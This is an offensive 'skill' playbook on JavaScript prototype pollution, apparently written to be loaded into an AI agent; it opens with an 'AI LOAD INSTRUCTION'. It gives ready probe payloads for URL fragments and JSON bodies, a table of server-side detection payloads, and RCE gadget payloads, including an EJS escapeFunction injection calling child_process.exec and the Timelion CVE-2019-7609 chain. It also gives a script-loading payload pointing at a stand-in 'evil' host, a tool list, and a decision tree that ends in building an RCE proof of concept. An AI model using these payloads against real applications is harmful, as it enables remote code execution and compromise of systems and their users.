SKILL: Prototype Pollution — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert prototype pollution for client and server JS. Covers
__proto__
vs
constructor.prototype
, merge-sink detection, Express/qs-style black-box probes, and gadget chains (EJS, Timelion-class patterns, child_process/NODE_OPTIONS). Assumes you know object spread and prototype inheritance — focus is on parser behavior and post-pollution sinks.

Chinese Routing Tip: Prioritize suspicion of PP when there is deep merging, recursive assign,

Object.assign

after

JSON.parse

, or URL queries are converted into nested objects.

0. QUICK START

Client-side first probes

text

#__proto__[polluted]=1
#__proto__[polluted]=polluted
#constructor[prototype][polluted]=1

In scenarios that can be reflected to the DOM or framework routing, use

alert(1)

console

to observe whether global object properties are polluted.

text

#__proto__[xxx]=alert(1)

Server-side first probes（JSON / form）

json

{"__proto__":{"polluted":true}}

json

{"constructor":{"prototype":{"polluted":true}}}

Check after sending: See if subsequent unrelated responses carry abnormal headers/status codes/JSON spaces, or if application logic reads

Object.prototype.polluted

(see §3 detection table).

Quick boolean

If the target uses

lodash.merge

deep-extend

hoek.applyToDefaults

, or partial

qs

query-string

configurations, increase priority.

1. MECHANISM

Prototype Chain: When accessing

obj.key

, if

obj

does not have

key

as its own property, it searches up along

[[Prototype]]

until it reaches

Object.prototype

__proto__
: Many parsers treat the literal key

__proto__

as a magic key that "attaches the following properties to the prototype" (a historically accessible property path of

Object.prototype

). Merging

{ "__proto__": { "x": 1 } }

may be equivalent to

Object.prototype.x = 1

(depending on implementation and patched version).

constructor.prototype
:

constructor

usually points to the constructor function of the object;

constructor.prototype

is the

prototype

object of this constructor. For ordinary objects, it is connected to

Object.prototype

by default. The path is as follows:

json

{"constructor":{"prototype":{"polluted":1}}}

It is not necessarily equivalent to

__proto__

(differences in filtering, JSON parsing, Bun/Node), so dual-line testing is required.

Attack Essence: It is not "passing one more parameter", but in a non-isolated merge algorithm, pointing a controllable key to the prototype object, so that the global or shared template context obtains malicious properties, and subsequent code "normally" reads this property to trigger the gadget.

2. CLIENT-SIDE DETECTION

URL fragment

text

https://app.example/page#__proto__[admin]=1

text

https://app.example/#__proto__[xxx]=alert(1)

If the router or analytics parses the fragment into an object and merges it, pollution may occur.

constructor.prototype

path

text

#constructor[prototype][role]=admin

DOM / attribute injection ideas

If the framework merges attribute names as object keys:

text

__proto__[src]=//evil/xss.js

Event handler type keys (implementation dependent):

text

__proto__[onerror]=alert(1)

Verification: Open a new page without fragment, check in the console whether

Object.prototype

has residual test keys; pay attention to interference from extensions and DevTools.

3. SERVER-SIDE DETECTION (Express / Node, black-box)

The following payloads assume that the body or query is deeply parsed into an object by qs or similar parsers (or combined with

body-parser

). Observe global side effects, not just the return value of the current interface.

Payload（JSON 示意）	预期可观察信号
`{"__proto__":{"parameterLimit":1}}`	Multi-parameters are ignored or parsed abnormally in subsequent requests ( `qs` style `parameterLimit` )
`{"__proto__":{"ignoreQueryPrefix":true}}`	Double question mark prefixes like `??foo=bar` are accepted or behavior changes abruptly
`{"__proto__":{"allowDots":true}}`	Nested keys like `?foo.bar=baz` are expanded according to dots
`{"__proto__":{"json spaces":" "}}`	JSON serialized responses have extra spaces ( `JSON.stringify` is affected by polluted space settings)
`{"__proto__":{"exposedHeaders":["foo"]}}`	CORS responses have headers related to `foo` (if the framework reads configuration from the prototype)
`{"__proto__":{"status":510}}`	A response status code becomes 510 or other abnormal code (the application reads `status` from the object)

Operation Points: Send the pollution request first, then send a clean request to observe whether it is persistent; connection pool and worker lifecycle will affect "whether it is globally visible".

4. EXPLOITATION GADGETS

目标 / 场景	载荷或模式	备注
EJS	`{"__proto__":{"client":1,"escapeFunction":"JSON.stringify; process.mainModule.require('child_process').exec('COMMAND')"}}`	If options such as `escapeFunction` are read from the polluted prototype by the template engine, it can lead to RCE; strongly related to version and configuration
Timelion Expression Chain (CVE-2019-7609)	`.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("COMMAND")')`	Historical chain: Prototype pollution + timeline expression execution; used to understand the combination of expression + PP
Node `child_process`	Pollute `shell` , `argv0` , `env` , `NODE_OPTIONS` , etc. (merged into `exec` / `fork` option objects)	Depends on whether `spawn` / `fork` is called later and options are read from the prototype chain
General constructor path	`{"constructor":{"prototype":{"foo":"bar"}}}`	Bypass weak validation that only filters the `__proto__` key

Chain Thinking: Pollution → A dependency reads

obj.settings.xxx

without

hasOwnProperty

check → RCE / SSRF / path traversal.

5. TOOLS

项目	用途
yeswehack/pp-finder	Assist in locating PP susceptible merge points and patterns
yuske/silent-spring	Research and detect related prototype pollution surfaces
yuske/server-side-prototype-pollution	Server-side PP test suite/ideas
BlackFan/client-side-prototype-pollution	Browser-side PP cases and payloads
portswigger/server-side-prototype-pollution	Burp ecosystem extension/supporting materials
msrkp/PPScan	Scanning/verification assistance

Priority is given to use on authorized targets; automated tools may have side effects on stateful applications.

6. DECISION TREE

                    Input merged into nested object?
                    (query, JSON, GraphQL vars, YAML→JSON)
                                |
               NO --------------+-------------- YES
               |                              |
        Other vuln class                Parser allows __proto__ /
                                        constructor.prototype keys?
                                                    |
                                    NO --------------+-------------- YES
                                    |                              |
                             Check unicode /                    Confirm global effect:
                             bypass of key names               clean follow-up request
                                    |                              |
                                    +--------------+----------------+
                                                   |
                                                   v
                                    Gadget present? (template, spawn, JSON.stringify opts, CORS)
                                                   |
                              NO ------------------+------------------ YES
                              |                                         |
                       Report PP as DoS /              Build minimal RCE or
                       logic impact                   high-impact PoC
                              |                                         |
                              +---------------------+-------------------+
                                                    |
                                                    v
                              Client-side: fragment / DOM / third-party script
                              Server-side: qs/body-parser/lodash/deep-merge version audit

Related routing

Input routing and multiple types of injection parallel entry → Injection Testing Router.
Template execution chain (non-PP) → SSTI.
Insecure deserialization (non-JS prototype) → Deserialization.",

prototype-pollution

NPX Install

Tags

SKILL.md Content (Chinese)

SKILL: Prototype Pollution — Expert Attack Playbook

0. QUICK START

Client-side first probes

Server-side first probes（JSON / form）

Quick boolean

1. MECHANISM

2. CLIENT-SIDE DETECTION

URL fragment

`constructor.prototype`
path

DOM / attribute injection ideas

3. SERVER-SIDE DETECTION (Express / Node, black-box)

4. EXPLOITATION GADGETS

5. TOOLS

6. DECISION TREE

Related routing